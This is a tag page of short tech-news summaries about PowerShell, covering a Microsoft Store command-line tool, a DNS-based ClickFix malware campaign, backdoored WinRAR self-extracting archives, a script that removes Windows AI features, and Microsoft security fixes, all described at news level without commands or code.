All articles tagged with #powershell
Microsoft introduced a PowerShell-based CLI for the Microsoft Store, enabling search, installation, and updates of Store apps directly from the command line, including bulk updates; however, it only works with Store-listed apps and may not include popular programs like Chrome or Paint.NET.
A new ClickFix variant uses a DNS-based delivery channel: victims are prompted to run nslookup in the Run dialog, querying an attacker-controlled DNS server. The DNS response contains a PowerShell payload that, when executed, downloads a ZIP with a Python runtime and malware scripts, establishes persistence, and installs ModeloRAT. This marks the first known use of DNS for staging and delivering ClickFix payloads, enabling on-the-fly payload updates and blending with normal DNS traffic instead of relying on HTTP.
A PowerShell script called Remove Windows AI, released on GitHub by Zoicware, enables Windows 11 users to disable built-in AI features such as Copilot, Recall, and Windows Studio Effects for privacy or a cleaner OS. The script is actively maintained and updated to remove newly added AI components, with users encouraged to report missing keys or features for future updates.
Microsoft has added a new security feature to Windows PowerShell 5.1 that prompts users to confirm before executing web content without special parameters, allowing them to choose between safety and potential risk, primarily impacting enterprise environments but also relevant for interactive users.,
Hackers are using WinRAR self-extracting archives to plant backdoors without triggering security agents on target systems. The SFX files contain harmless decoy files and are password-protected. The attackers add malicious functionality to the SFX files, allowing them to run PowerShell, Windows command prompt, and task manager with system privileges. This type of attack is likely to remain undetected by traditional antivirus software. Users are advised to use appropriate software to check the content of SFX archives and look for potential scripts or commands scheduled to run upon extraction.
Hackers are using WinRAR self-extracting archives to plant backdoors without triggering security agents on target systems. The SFX files contain harmless decoy files and are password-protected. The attackers add malicious functionality to the SFX files, allowing them to run PowerShell, Windows command prompt, and task manager with system privileges. This type of attack is likely to remain undetected by traditional antivirus software. Users are advised to use appropriate software to check the content of SFX archives and look for potential scripts or commands scheduled to run upon extraction.
Microsoft has released PowerShell scripts to fix a BitLocker security bypass vulnerability in the Windows Recovery Environment (WinRE) for Windows 10 and 11 systems. The vulnerability could allow access to encrypted data in storage devices. The scripts enable enterprises to automatically update WinRE images to protect Windows devices. The flaw can only be exploited on systems with the winre.wim on the recovery partition.